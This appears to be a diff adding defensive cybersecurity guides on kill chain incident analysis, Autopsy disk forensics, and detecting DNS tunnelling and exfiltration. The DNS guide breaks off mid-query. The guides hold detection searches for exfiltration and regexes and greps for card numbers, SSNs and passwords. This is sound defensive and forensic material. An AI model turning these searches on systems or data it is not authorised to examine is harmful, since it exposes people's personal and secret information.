- Indicators: DNS queries from adversary IP, LinkedIn scraping, job posting analysis, Shodan scans of organization infrastructure
|
||||
|
||||
**Phase 2 - Weaponization**: Adversary creates attack tool (malware + exploit).
|
||||
- Indicators: Malware compilation timestamps, exploit document metadata, builder artifacts in malware samples
|
||||
|
||||
**Phase 3 - Delivery**: Adversary transmits weapon to target.
|
||||
- Indicators: Phishing emails, malicious attachments, drive-by downloads, USB drops, supply chain compromise
|
||||
|
||||
**Phase 4 - Exploitation**: Adversary exploits vulnerability to execute code.
|
||||
- Indicators: CVE exploitation events in application/OS logs, memory corruption artifacts, shellcode execution
|
||||
|
||||
**Phase 5 - Installation**: Adversary establishes persistence on target.
|
||||
- Indicators: New scheduled tasks, registry run keys, service installation, web shells, bootkits
|
||||
|
||||
**Phase 6 - Command & Control (C2)**: Adversary communicates with compromised system.
|
||||
- Indicators: Beaconing traffic (regular intervals), DNS tunneling, HTTPS to uncommon domains, C2 framework signatures (Cobalt Strike, Sliver)
|
||||
|
||||
**Phase 7 - Actions on Objectives**: Adversary achieves goals.
|
||||
- Indicators: Data staging/exfiltration, lateral movement, ransomware execution, destructive activity
|
||||
|
||||
### Step 2: Identify Phase Completion and Detection Points
|
||||
|
||||
Create a phase matrix for the incident:
|
||||
```
|
||||
Phase 1: Recon → Completed (undetected)
|
||||
Phase 2: Weaponize → Completed (undetected — pre-attack)
|
||||
Phase 3: Delivery → Completed; phishing email bypassed SEG
|
||||
Phase 4: Exploit → Completed; CVE-2023-23397 exploited
|
||||
Phase 5: Install → DETECTED: EDR flagged scheduled task creation (attack stalled here)
|
||||
Phase 6: C2 → Not achieved (installation blocked)
|
||||
Phase 7: Objectives → Not achieved
|
||||
```
|
||||
|
||||
For each phase completed without detection, document the defensive control gap.
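One way to keep this matrix machine-readable is a small record per phase. This is a minimal sketch, not part of the Lockheed Martin model itself: the `PhaseResult` fields and the `control_gaps` helper are hypothetical names, and the data mirrors the example matrix above.

```python
from dataclasses import dataclass
from typing import List


@dataclass
class PhaseResult:
    phase: str
    completed: bool   # did the adversary finish this phase?
    detected: bool    # did any control alert on or block it?
    note: str = ""


def control_gaps(matrix: List[PhaseResult]) -> List[str]:
    """Return the phases the adversary completed without being detected."""
    return [p.phase for p in matrix if p.completed and not p.detected]


incident = [
    PhaseResult("Reconnaissance", True, False),
    PhaseResult("Weaponization", True, False, "pre-attack"),
    PhaseResult("Delivery", True, False, "phishing email bypassed SEG"),
    PhaseResult("Exploitation", True, False, "CVE-2023-23397 exploited"),
    PhaseResult("Installation", False, True, "EDR flagged scheduled task creation"),
    PhaseResult("Command & Control", False, False),
    PhaseResult("Actions on Objectives", False, False),
]

if __name__ == "__main__":
    for phase in control_gaps(incident):
        print(f"Control gap: {phase}")
```

Each phase returned by `control_gaps` is a candidate entry for the control-gap documentation.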
|
||||
|
||||
### Step 3: Map to MITRE ATT&CK for Technique Detail
|
||||
|
||||
Each kill chain phase maps to one or more ATT&CK tactics:
|
||||
- Delivery → Initial Access (TA0001)
|
||||
- Exploitation → Execution (TA0002)
|
||||
- Installation → Persistence (TA0003), Privilege Escalation (TA0004)
|
||||
- C2 → Command and Control (TA0011)
|
||||
- Actions on Objectives → Exfiltration (TA0010), Impact (TA0040)
|
||||
|
||||
Within each phase, enumerate specific ATT&CK techniques observed and map to existing detections.
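The mapping in this step can be captured as a lookup table so that observed techniques are grouped by kill chain phase. A minimal sketch, assuming only the phase-to-tactic pairs listed here; `group_by_phase` and the sample observations are illustrative, and a technique that belongs to several tactics would need one row per tactic.

```python
from collections import defaultdict
from typing import Dict, Iterable, List, Tuple

# Phase-to-tactic pairs taken from the list in this step.
KILL_CHAIN_TO_ATTACK = {
    "Delivery": ["TA0001"],
    "Exploitation": ["TA0002"],
    "Installation": ["TA0003", "TA0004"],
    "Command & Control": ["TA0011"],
    "Actions on Objectives": ["TA0010", "TA0040"],
}

Observation = Tuple[str, str, bool]  # (technique_id, tactic_id, has_detection)


def group_by_phase(observations: Iterable[Observation]) -> Dict[str, List[Tuple[str, bool]]]:
    """Group observed techniques under the kill chain phase of their tactic."""
    tactic_to_phase = {
        tactic: phase
        for phase, tactics in KILL_CHAIN_TO_ATTACK.items()
        for tactic in tactics
    }
    grouped = defaultdict(list)
    for technique_id, tactic_id, has_detection in observations:
        phase = tactic_to_phase.get(tactic_id, "Unmapped")
        grouped[phase].append((technique_id, has_detection))
    return dict(grouped)


if __name__ == "__main__":
    observed = [
        ("T1566.001", "TA0001", False),  # spearphishing attachment
        ("T1053.005", "TA0003", True),   # scheduled task
    ]
    for phase, techniques in group_by_phase(observed).items():
        print(phase, techniques)
```

Techniques that end up under `Unmapped` belong to tactics outside the list above and need an explicit phase decision by the analyst.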
|
||||
|
||||
### Step 4: Identify Courses of Action per Phase
|
||||
|
||||
For each phase, document applicable defensive courses of action (COAs):
|
||||
- **Detect COA**: What detection would alert on adversary activity in this phase?
|
||||
- **Deny COA**: What control would prevent the adversary from completing this phase?
|
||||
- **Disrupt COA**: What control would interrupt the adversary mid-phase?
|
||||
- **Degrade COA**: What control would reduce the adversary's effectiveness in this phase?
|
||||
- **Deceive COA**: What deception (honeypots, canary tokens) would expose activity in this phase?
|
||||
- **Destroy COA**: What active defense capability would neutralize adversary infrastructure?
|
||||
|
||||
### Step 5: Produce Kill Chain Analysis Report
|
||||
|
||||
Structure findings as:
|
||||
1. Attack narrative (timeline of phases)
|
||||
2. Phase-by-phase analysis with evidence
|
||||
3. Detection point analysis (what worked, what failed)
|
||||
4. Defensive recommendation per phase prioritized by cost/effectiveness
|
||||
5. Control improvement roadmap
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Term | Definition |
|
||||
|------|-----------|
|
||||
| **Kill Chain** | Sequential model of adversary intrusion phases; breaking any link theoretically stops the attack |
|
||||
| **Courses of Action (COA)** | Defensive responses mapped to each kill chain phase: detect, deny, disrupt, degrade, deceive, destroy |
|
||||
| **Beaconing** | Regular, periodic C2 check-in pattern from compromised host to adversary server; detectable by frequency analysis |
|
||||
| **Phase Completion** | Adversary successfully finishes a kill chain phase and progresses to the next; defense-in-depth aims to prevent this |
|
||||
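| **Intelligence Gain/Loss** | Assessment of the trade-off between stopping an intrusion early and continuing to observe it: blocking at Phase 3 rather than Phase 5 reduces risk but may forfeit intelligence about adversary capabilities or intent |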
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
- **MITRE ATT&CK Navigator**: Overlay kill chain phases with ATT&CK technique coverage for integrated analysis
|
||||
- **Elastic Security EQL**: Event Query Language for querying multi-phase attack sequences in Elastic SIEM
|
||||
- **Splunk ES**: Timeline visualization and correlation searches for kill chain phase sequencing
|
||||
- **MISP**: Kill chain tagging via galaxy clusters for structured incident event documentation
|
||||
|
||||
## Common Pitfalls
|
||||
|
||||
- **Linear assumption**: Adversaries don't always progress linearly: they may skip phases (weaponization already complete from a previous campaign) or loop back (re-establish C2 after detection).
|
||||
- **Ignoring Phases 1 and 2**: Reconnaissance and weaponization occur before the defender has visibility. Intelligence about these phases requires external sources (OSINT, threat intelligence).
|
||||
- **Missing insider threats**: The kill chain was designed for external adversaries. Insider threats may skip directly to Phase 7 without traversing earlier phases.
|
||||
- **Confusing with ATT&CK tactics**: The 7-phase kill chain and 14 ATT&CK tactics are complementary but not directly equivalent. Maintain distinction to prevent analytic confusion.
|
||||
@@ -0,0 +1,252 @@
|
||||
---
|
||||
name: analyzing-disk-image-with-autopsy
|
||||
description: Perform comprehensive forensic analysis of disk images using Autopsy to recover files, examine artifacts, and build investigation timelines.
|
||||
domain: cybersecurity
|
||||
subdomain: digital-forensics
|
||||
tags: [forensics, autopsy, disk-analysis, sleuth-kit, file-recovery, artifact-analysis]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Analyzing Disk Image with Autopsy
|
||||
|
||||
## When to Use
|
||||
- When you have a forensic disk image and need structured analysis of its contents
|
||||
- During investigations requiring file recovery, keyword searching, and timeline analysis
|
||||
- When non-technical stakeholders need visual reports from forensic evidence
|
||||
- For examining file system metadata, deleted files, and embedded artifacts
|
||||
- When building a comprehensive case from multiple disk images
|
||||
|
||||
## Prerequisites
|
||||
- Autopsy 4.x installed (Windows) or Autopsy 4.x with The Sleuth Kit (Linux)
|
||||
- Forensic disk image in raw (dd), E01 (EnCase), or AFF format
|
||||
- Minimum 8GB RAM (16GB recommended for large images)
|
||||
- Java Runtime Environment (JRE) 8+ for Autopsy
|
||||
- Sufficient disk space for the Autopsy case database (2-3x image size)
|
||||
- Hash databases (NSRL, known-bad hashes) for file identification
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Install Autopsy and Configure Environment
|
||||
|
||||
```bash
|
||||
# On Linux, install Sleuth Kit and Autopsy
|
||||
sudo apt-get install autopsy sleuthkit
|
||||
|
||||
# Download Autopsy 4.x (GUI version) from official source
|
||||
wget https://github.com/sleuthkit/autopsy/releases/download/autopsy-4.21.0/autopsy-4.21.0.zip
|
||||
unzip autopsy-4.21.0.zip -d /opt/autopsy
|
||||
|
||||
# On Windows, run the MSI installer from sleuthkit.org
|
||||
# Launch Autopsy
|
||||
/opt/autopsy/autopsy-4.21.0/bin/autopsy --nosplash
|
||||
|
||||
# For Sleuth Kit command-line analysis alongside Autopsy
|
||||
sudo apt-get install sleuthkit
|
||||
```
|
||||
|
||||
### Step 2: Create a New Case and Add the Disk Image
|
||||
|
||||
```
|
||||
1. Launch Autopsy > "New Case"
|
||||
2. Enter Case Name: "CASE-2024-001-Workstation"
|
||||
3. Set Base Directory: /cases/case-2024-001/autopsy/
|
||||
4. Enter Case Number, Examiner Name
|
||||
5. Click "Add Data Source"
|
||||
6. Select "Disk Image or VM File"
|
||||
7. Browse to: /cases/case-2024-001/images/evidence.dd
|
||||
8. Select Time Zone of the original system
|
||||
9. Configure Ingest Modules (see Step 3)
|
||||
```
|
||||
|
||||
```bash
|
||||
# Alternatively, use Sleuth Kit CLI to verify the image first
|
||||
img_stat /cases/case-2024-001/images/evidence.dd
|
||||
|
||||
# List partitions in the image
|
||||
mmls /cases/case-2024-001/images/evidence.dd
|
||||
|
||||
# Output example:
|
||||
# DOS Partition Table
|
||||
# Offset Sector: 0
|
||||
# Units are in 512-byte sectors
|
||||
# Slot Start End Length Description
|
||||
# 00: ----- 0000000000 0000002047 0000002048 Unallocated
|
||||
# 01: 00:00 0000002048 0001026047 0001024000 NTFS (0x07)
|
||||
# 02: 00:01 0001026048 0976771071 0975745024 NTFS (0x07)
|
||||
|
||||
# List files in a partition (offset 2048 sectors)
|
||||
fls -o 2048 /cases/case-2024-001/images/evidence.dd
|
||||
```
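When several images need triage, the partition offsets that `fls`, `icat`, and the other Sleuth Kit tools expect after `-o` can be pulled out of `mmls` output programmatically. The sketch below parses text shaped like the example output above; the regular expression, the `Partition` tuple, and `parse_mmls` are assumptions for illustration, and real `mmls` output may contain extra rows (metadata, unallocated space) that callers should filter by description.

```python
import re
from typing import List, NamedTuple


class Partition(NamedTuple):
    slot: str
    start: int        # first sector, the value passed to -o
    end: int
    length: int       # size in sectors
    description: str


# Columns: index, slot, start, end, length, description
ROW = re.compile(r"^(\d+):\s+(\S+)\s+(\d+)\s+(\d+)\s+(\d+)\s+(.+)$")
UNITS = re.compile(r"Units are in (\d+)-byte sectors")


def parse_mmls(text: str) -> List[Partition]:
    """Parse partition rows from mmls text output."""
    partitions = []
    for line in text.splitlines():
        match = ROW.match(line.strip())
        if match:
            _, slot, start, end, length, desc = match.groups()
            partitions.append(
                Partition(slot, int(start), int(end), int(length), desc.strip())
            )
    return partitions


def sector_size(text: str, default: int = 512) -> int:
    """Read the sector size from the 'Units are in N-byte sectors' line."""
    match = UNITS.search(text)
    return int(match.group(1)) if match else default


SAMPLE = """\
DOS Partition Table
Offset Sector: 0
Units are in 512-byte sectors
     Slot    Start        End          Length       Description
01:  00:00   0000002048   0001026047   0001024000   NTFS (0x07)
02:  00:01   0001026048   0976771071   0975745024   NTFS (0x07)
"""

if __name__ == "__main__":
    size = sector_size(SAMPLE)
    for part in parse_mmls(SAMPLE):
        gib = part.length * size / 2**30
        print(f"-o {part.start}  {gib:.1f} GiB  {part.description}")
```

In a layout like this one, the larger second partition is usually the one holding user data, so its start sector is the offset to use when looking for user files.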
|
||||
|
||||
### Step 3: Configure and Run Ingest Modules
|
||||
|
||||
```
|
||||
Enable the following Autopsy Ingest Modules:
|
||||
- Recent Activity: Extracts browser history, downloads, cookies, bookmarks
|
||||
- Hash Lookup: Compares files against NSRL and known-bad hash sets
|
||||
- File Type Identification: Identifies files by signature, not extension
|
||||
- Keyword Search: Indexes content for full-text searching
|
||||
- Email Parser: Extracts emails from PST, MBOX, EML files
|
||||
- Extension Mismatch Detector: Finds files with wrong extensions
|
||||
- Exif Parser: Extracts metadata from images (GPS, camera, timestamps)
|
||||
- Encryption Detection: Identifies encrypted files and containers
|
||||
- Interesting Files Identifier: Flags files matching custom rule sets
|
||||
- Embedded File Extractor: Extracts files from ZIP, Office docs, PDFs
|
||||
- Picture Analyzer: Categorizes images using PhotoDNA or hash matching
|
||||
- Data Source Integrity: Verifies image hash during ingest
|
||||
```
|
||||
|
||||
```bash
|
||||
# Configure NSRL hash set for known-good filtering
|
||||
# Download NSRL from https://www.nist.gov/itl/ssd/software-quality-group/national-software-reference-library-nsrl
|
||||
wget https://s3.amazonaws.com/rds.nsrl.nist.gov/RDS/current/rds_modernm.zip
|
||||
unzip rds_modernm.zip -d /opt/autopsy/hashsets/
|
||||
|
||||
# Import into Autopsy:
|
||||
# Tools > Options > Hash Sets > Import > Select NSRLFile.txt
|
||||
# Mark as "Known" (to filter out known-good files)
|
||||
```
|
||||
|
||||
### Step 4: Analyze File System and Recover Deleted Files
|
||||
|
||||
```bash
|
||||
# In Autopsy GUI: Navigate tree structure
|
||||
# - Data Sources > evidence.dd > vol2 (NTFS)
|
||||
# - Examine directory tree, note deleted files (marked with X)
|
||||
|
||||
# Using Sleuth Kit CLI for targeted recovery
|
||||
# List deleted files
|
||||
fls -rd -o 2048 /cases/case-2024-001/images/evidence.dd
|
||||
|
||||
# Recover a specific deleted file by inode
|
||||
icat -o 2048 /cases/case-2024-001/images/evidence.dd 14523 > /cases/case-2024-001/recovered/deleted_document.docx
|
||||
|
||||
# Extract all files (-e) under a directory; -d takes the directory's inode number from fls, not a path (14000 is a placeholder)
|
||||
tsk_recover -e -o 2048 -d 14000 \
|
||||
/cases/case-2024-001/images/evidence.dd \
|
||||
/cases/case-2024-001/recovered/documents/
|
||||
|
||||
# Get detailed file metadata
|
||||
istat -o 2048 /cases/case-2024-001/images/evidence.dd 14523
|
||||
# Shows: creation, modification, access, MFT change timestamps, size, data runs
|
||||
```
|
||||
|
||||
### Step 5: Perform Keyword Searches and Tag Evidence
|
||||
|
||||
```
|
||||
In Autopsy:
|
||||
1. Keyword Search panel > "Ad Hoc Keyword Search"
|
||||
2. Search terms: credit card patterns, SSN regex, email addresses
|
||||
3. Example regex for credit cards: \b(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14})\b
|
||||
4. Example regex for SSN: \b\d{3}-\d{2}-\d{4}\b
|
||||
5. Review results > Right-click items > "Add Tag"
|
||||
6. Create tags: "Evidence-Critical", "Evidence-Supporting", "Requires-Review"
|
||||
7. Add comments to tagged items documenting relevance
|
||||
```
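Card-number patterns like the one above also match many random digit runs, so hits are often post-filtered with the Luhn checksum before tagging. The sketch below is an illustration outside Autopsy: it reuses the two regular expressions from the steps above, and `luhn_valid` and `scan_text` are hypothetical helper names. The sample numbers in the usage lines are widely published test values, not real data.

```python
import re
from typing import Dict, List

CARD_RE = re.compile(r"\b(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14})\b")
SSN_RE = re.compile(r"\b\d{3}-\d{2}-\d{4}\b")


def luhn_valid(number: str) -> bool:
    """Return True if the digit string passes the Luhn checksum."""
    total = 0
    for index, char in enumerate(reversed(number)):
        digit = int(char)
        if index % 2 == 1:       # double every second digit from the right
            digit *= 2
            if digit > 9:
                digit -= 9
        total += digit
    return total % 10 == 0


def scan_text(text: str) -> Dict[str, List[str]]:
    """Collect SSN-shaped strings and Luhn-valid card candidates."""
    cards = [m for m in CARD_RE.findall(text) if luhn_valid(m)]
    return {"cards": cards, "ssns": SSN_RE.findall(text)}


if __name__ == "__main__":
    sample = "card 4111111111111111, typo 4111111111111112, id 123-45-6789"
    print(scan_text(sample))
```

The Luhn filter only removes strings that cannot be card numbers; surviving hits still need analyst review in context.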
|
||||
|
||||
```bash
|
||||
# Using Sleuth Kit for CLI keyword search (-t d prints the decimal byte offset of each hit)
|
||||
srch_strings -a -t d /cases/case-2024-001/images/evidence.dd | \
|
||||
grep -iE '(password|secret|confidential)' > /cases/case-2024-001/keyword_hits.txt
|
||||
|
||||
# Search for specific file signatures
|
||||
sigfind 25504446 /cases/case-2024-001/images/evidence.dd
|
||||
# 25504446 = %PDF header signature
|
||||
```
|
||||
|
||||
### Step 6: Build Timeline and Generate Reports
|
||||
|
||||
```
|
||||
In Autopsy:
|
||||
1. Timeline viewer: Tools > Timeline
|
||||
2. Select date range of interest (incident window)
|
||||
3. Filter by event type: File Created, Modified, Accessed, Web Activity
|
||||
4. Zoom into suspicious time periods
|
||||
5. Export timeline events as CSV for external analysis
|
||||
|
||||
Generate Report:
|
||||
1. Generate Report > HTML Report
|
||||
2. Select tagged items and data sources to include
|
||||
3. Configure report sections: file listings, keyword hits, timeline
|
||||
4. Export to /cases/case-2024-001/reports/
|
||||
```
|
||||
|
||||
```bash
|
||||
# Using Sleuth Kit mactime for CLI timeline
|
||||
fls -r -m "/" -o 2048 /cases/case-2024-001/images/evidence.dd > /cases/case-2024-001/bodyfile.txt
|
||||
|
||||
# Generate timeline from bodyfile
|
||||
mactime -b /cases/case-2024-001/bodyfile.txt -d > /cases/case-2024-001/timeline.csv
|
||||
|
||||
# Filter timeline to specific date range
|
||||
mactime -b /cases/case-2024-001/bodyfile.txt \
|
||||
-d 2024-01-15..2024-01-20 > /cases/case-2024-001/incident_timeline.csv
|
||||
```
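The intermediate bodyfile is plain text, so it can also be filtered before `mactime` runs. The sketch below assumes the pipe-delimited TSK 3.x body format (`MD5|name|inode|mode|UID|GID|size|atime|mtime|ctime|crtime`, with times as Unix epoch seconds); `parse_body_line`, `in_window`, and the sample rows are made up for illustration.

```python
from datetime import datetime, timezone
from typing import Dict, NamedTuple


class BodyEntry(NamedTuple):
    name: str
    inode: str
    size: int
    times: Dict[str, int]   # atime, mtime, ctime, crtime in epoch seconds


def parse_body_line(line: str) -> BodyEntry:
    """Parse one bodyfile row; rsplit keeps any '|' inside the file name."""
    _md5, rest = line.rstrip("\n").split("|", 1)
    (name, inode, _mode, _uid, _gid,
     size, atime, mtime, ctime, crtime) = rest.rsplit("|", 9)
    times = {
        "atime": int(atime),
        "mtime": int(mtime),
        "ctime": int(ctime),
        "crtime": int(crtime),
    }
    return BodyEntry(name, inode, int(size), times)


def in_window(entry: BodyEntry, start: datetime, end: datetime) -> bool:
    """True if any of the entry's timestamps falls inside [start, end)."""
    lo, hi = start.timestamp(), end.timestamp()
    return any(lo <= ts < hi for ts in entry.times.values())


SAMPLE = (
    "0|/Users/suspect/Documents/plan.docx|14523-128-1|r/rrwxrwxrwx|0|0|20480|"
    "1705312800|1705312800|1705312800|1705226400\n"
    "0|/Windows/notepad.exe|2101-128-1|r/rrwxrwxrwx|0|0|201216|"
    "1685577600|1685577600|1685577600|1685577600\n"
)

if __name__ == "__main__":
    start = datetime(2024, 1, 15, tzinfo=timezone.utc)
    end = datetime(2024, 1, 21, tzinfo=timezone.utc)
    for row in SAMPLE.splitlines():
        entry = parse_body_line(row)
        if in_window(entry, start, end):
            print(entry.name)
```

The window is interpreted in UTC here; adjust the `tzinfo` if the case timeline is kept in the original system's time zone.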
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Concept | Description |
|
||||
|---------|-------------|
|
||||
| Ingest Modules | Automated analysis plugins that process data sources upon import |
|
||||
| MFT (Master File Table) | NTFS metadata structure recording all file entries and attributes |
|
||||
| File carving | Recovering files from unallocated space using file signatures |
|
||||
| Hash filtering | Using NSRL or custom hash sets to exclude known-good or flag known-bad files |
|
||||
| Timeline analysis | Chronological reconstruction of file system and user activity events |
|
||||
| Deleted file recovery | Restoring files whose directory entries are removed but data remains |
|
||||
| Keyword indexing | Full-text search index built from all file content including slack space |
|
||||
| Artifact extraction | Automated parsing of browser, email, registry, and OS-specific artifacts |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
| Tool | Purpose |
|
||||
|------|---------|
|
||||
| Autopsy | Open-source GUI forensic platform for disk image analysis |
|
||||
| The Sleuth Kit (TSK) | Command-line forensic toolkit underlying Autopsy |
|
||||
| fls | List files and directories in a disk image including deleted entries |
|
||||
| icat | Extract file content by inode number from a disk image |
|
||||
| mactime | Generate timeline from TSK bodyfile format |
|
||||
| mmls | Display partition layout of a disk image |
|
||||
| NSRL | NIST hash database for identifying known software files |
|
||||
| sigfind | Search for file signatures at the sector level |
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
**Scenario 1: Employee Data Theft Investigation**
|
||||
Import the employee workstation image, run all ingest modules, search for company-confidential file names and keywords, examine USB connection artifacts in Recent Activity, check for cloud storage client artifacts, review deleted files for evidence of data staging, generate HTML report for legal team.
|
||||
|
||||
**Scenario 2: Malware Infection Forensics**
|
||||
Add the compromised system image, enable Extension Mismatch and Encryption Detection modules, examine the prefetch directory for execution evidence, search for known malware hashes, build timeline around the infection window, extract suspicious executables for further analysis in a sandbox.
|
||||
|
||||
**Scenario 3: Child Sexual Abuse Material (CSAM) Investigation**
|
||||
Import image with PhotoDNA and Project VIC hash sets enabled, run Picture Analyzer module, hash all image files against known-bad databases, tag and categorize matches by severity, generate law enforcement report with chain of custody documentation.
|
||||
|
||||
**Scenario 4: Intellectual Property Dispute**
|
||||
Import multiple employee disk images as separate data sources in one case, perform keyword searches for proprietary terms and project names, compare file hashes between sources, build timeline showing file access and transfer patterns, export evidence for legal review.
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
Autopsy Case Analysis Summary:
|
||||
Case: CASE-2024-001-Workstation
|
||||
Image: evidence.dd (500GB NTFS)
|
||||
Partitions: 2 (System Reserved + Primary)
|
||||
Total Files: 245,832
|
||||
Deleted Files: 12,456 (recoverable: 8,234)
|
||||
|
||||
Ingest Results:
|
||||
Hash Matches (Known Bad): 3 files
|
||||
Extension Mismatches: 17 files
|
||||
Keyword Hits: 234 across 45 files
|
||||
Encrypted Files: 5 containers detected
|
||||
EXIF Data Extracted: 1,245 images with metadata
|
||||
|
||||
Tagged Evidence:
|
||||
Critical: 12 items
|
||||
Supporting: 34 items
|
||||
Review: 67 items
|
||||
|
||||
Timeline Events: 1,234,567 entries (filtered to incident window: 892)
|
||||
Report: /cases/case-2024-001/reports/autopsy_report.html
|
||||
```
|
||||
@@ -0,0 +1,287 @@
|
||||
---
|
||||
name: analyzing-dns-logs-for-exfiltration
|
||||
description: >
|
||||
Analyzes DNS query logs to detect data exfiltration via DNS tunneling, DGA domain communication,
|
||||
and covert C2 channels using entropy analysis, query volume anomalies, and subdomain length
|
||||
detection in SIEM platforms. Use when SOC teams need to identify DNS-based threats that bypass
|
||||
traditional network security controls.
|
||||
domain: cybersecurity
|
||||
subdomain: soc-operations
|
||||
tags: [soc, dns, exfiltration, dns-tunneling, dga, c2-detection, splunk, threat-detection]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
# Analyzing DNS Logs for Exfiltration
|
||||
|
||||
## When to Use
|
||||
|
||||
Use this skill when:
|
||||
- SOC teams suspect data exfiltration through DNS tunneling to bypass firewall/proxy controls
|
||||
- Threat intelligence indicates adversaries using DNS-based C2 channels (e.g., Cobalt Strike DNS beacon)
|
||||
- UEBA detects anomalous DNS query volumes from specific hosts
|
||||
- Malware analysis reveals DNS-over-HTTPS (DoH) or DNS tunneling capabilities
|
||||
|
||||
**Do not use** for standard DNS troubleshooting or availability monitoring — this skill focuses on security-relevant DNS abuse detection.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- DNS query logging enabled (Windows DNS Server, BIND, Infoblox, or Cisco Umbrella)
|
||||
- DNS logs ingested into SIEM (Splunk with the `stream:dns` or `dns` sourcetype, or Zeek DNS logs)
|
||||
- Passive DNS data for historical domain resolution analysis
|
||||
- Baseline of normal DNS behavior (query volume, domain distribution, TXT record frequency)
|
||||
- Python 3 for entropy calculation (the example uses only the standard-library `math` and `collections` modules)
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Detect DNS Tunneling via Subdomain Length Analysis
|
||||
|
||||
DNS tunneling encodes data in subdomain labels, creating unusually long queries:
|
||||
|
||||
```spl
|
||||
index=dns sourcetype="stream:dns" query_type IN ("A", "AAAA", "TXT", "CNAME", "MX")
|
||||
| eval domain_parts = split(query, ".")
|
||||
| eval subdomain = mvindex(domain_parts, 0, mvcount(domain_parts)-3)
|
||||
| eval subdomain_str = mvjoin(subdomain, ".")
|
||||
| eval subdomain_len = len(subdomain_str)
|
||||
| eval tld = mvindex(domain_parts, -1)
|
||||
| eval registered_domain = mvindex(domain_parts, -2).".".tld
|
||||
| where subdomain_len > 50
|
||||
| stats count AS queries, dc(query) AS unique_queries,
|
||||
avg(subdomain_len) AS avg_subdomain_len,
|
||||
max(subdomain_len) AS max_subdomain_len,
|
||||
values(src_ip) AS sources
|
||||
by registered_domain
|
||||
| where queries > 20
|
||||
| sort - avg_subdomain_len
|
||||
| table registered_domain, queries, unique_queries, avg_subdomain_len, max_subdomain_len, sources
|
||||
```
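The same heuristic can be prototyped offline against exported logs before tuning the SPL thresholds. A minimal sketch, assuming queries are available as plain strings; like the search above it treats the last two labels as the registered domain, which is wrong for suffixes such as `co.uk`. The names `split_query` and `long_subdomain_stats` are illustrative.

```python
from collections import defaultdict
from typing import Dict, Iterable, Tuple


def split_query(query: str) -> Tuple[str, str]:
    """Return (subdomain, registered_domain) using a naive two-label rule."""
    labels = query.rstrip(".").lower().split(".")
    if len(labels) < 3:
        return "", ".".join(labels)
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def long_subdomain_stats(
    queries: Iterable[str], min_len: int = 50, min_queries: int = 20
) -> Dict[str, dict]:
    """Summarize domains that receive many queries with long subdomains."""
    lengths = defaultdict(list)
    for query in queries:
        subdomain, domain = split_query(query)
        if len(subdomain) > min_len:
            lengths[domain].append(len(subdomain))
    return {
        domain: {
            "queries": len(vals),
            "avg_len": round(sum(vals) / len(vals), 1),
            "max_len": max(vals),
        }
        for domain, vals in lengths.items()
        if len(vals) > min_queries
    }


if __name__ == "__main__":
    # Synthetic data: 25 long queries to one domain plus ordinary traffic.
    demo = [f"{'a' * 60}{i}.evil-tunnel.com" for i in range(25)]
    demo += ["www.example.com"] * 100
    print(long_subdomain_stats(demo))
```

The defaults match the thresholds in the search (subdomain longer than 50 characters, more than 20 queries per domain) and should be tuned against the local baseline.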
|
||||
|
||||
### Step 2: Detect High-Entropy Domain Queries (DGA Detection)
|
||||
|
||||
Domain Generation Algorithms produce random-looking domains:
|
||||
|
||||
```spl
|
||||
index=dns sourcetype="stream:dns"
|
||||
| eval domain_parts = split(query, ".")
|
||||
| eval sld = mvindex(domain_parts, -2)
|
||||
| eval sld_len = len(sld)
|
||||
| eval char_count = sld_len
|
||||
| eval vowels = len(replace(sld, "[^aeiou]", ""))
|
||||
| eval consonants = len(replace(sld, "[^bcdfghjklmnpqrstvwxyz]", ""))
|
||||
| eval digits = len(replace(sld, "[^0-9]", ""))
|
||||
| eval vowel_ratio = if(char_count > 0, vowels / char_count, 0)
|
||||
| eval digit_ratio = if(char_count > 0, digits / char_count, 0)
|
||||
| where sld_len > 12 AND (vowel_ratio < 0.2 OR digit_ratio > 0.3)
|
||||
| stats count AS queries, dc(query) AS unique_domains, values(query) AS sample_domains
|
||||
by src_ip
|
||||
| where unique_domains > 10
|
||||
| sort - queries
|
||||
```
|
||||
|
||||
**Python-based Shannon Entropy Calculation for DNS queries:**
|
||||
|
||||
```python
|
||||
import math
|
||||
from collections import Counter
|
||||
|
||||
def shannon_entropy(text):
|
||||
    """Calculate Shannon entropy of a string"""
|
||||
    if not text:
|
||||
        return 0
|
||||
    counter = Counter(text.lower())
|
||||
    length = len(text)
|
||||
    entropy = -sum(
|
||||
        (count / length) * math.log2(count / length)
|
||||
        for count in counter.values()
|
||||
    )
|
||||
    return round(entropy, 4)
|
||||
|
||||
# Test with examples
|
||||
normal_domain = "google" # Low entropy
|
||||
dga_domain = "x8kj2m9p4qw7n" # High entropy
|
||||
tunnel_subdomain = "aGVsbG8gd29ybGQ.evil.com" # Base64 encoded data
|
||||
|
||||
print(f"Normal: {shannon_entropy(normal_domain)}") # ~1.92
|
||||
print(f"DGA: {shannon_entropy(dga_domain)}") # ~3.70
|
||||
print(f"Tunnel: {shannon_entropy(tunnel_subdomain)}") # ~4.00
|
||||
|
||||
# Threshold: entropy > 3.5 for subdomain = likely tunneling/DGA
|
||||
```
|
||||
|
||||
**Splunk approximation of entropy scoring (a unique-character heuristic, not exact Shannon entropy):**
|
||||
|
||||
```spl
|
||||
index=dns sourcetype="stream:dns"
|
||||
| eval domain_parts = split(query, ".")
|
||||
| eval check_string = mvindex(domain_parts, 0)
|
||||
| eval check_len = len(check_string)
|
||||
| where check_len > 8
|
||||
| eval chars = split(check_string, "")
|
||||
| stats count AS total_chars, dc(chars) AS unique_chars by query, src_ip, check_string, check_len
|
||||
| eval entropy_estimate = log(unique_chars, 2) * (unique_chars / check_len)
|
||||
| where entropy_estimate > 3.5
|
||||
| stats count AS high_entropy_queries, dc(query) AS unique_queries by src_ip
|
||||
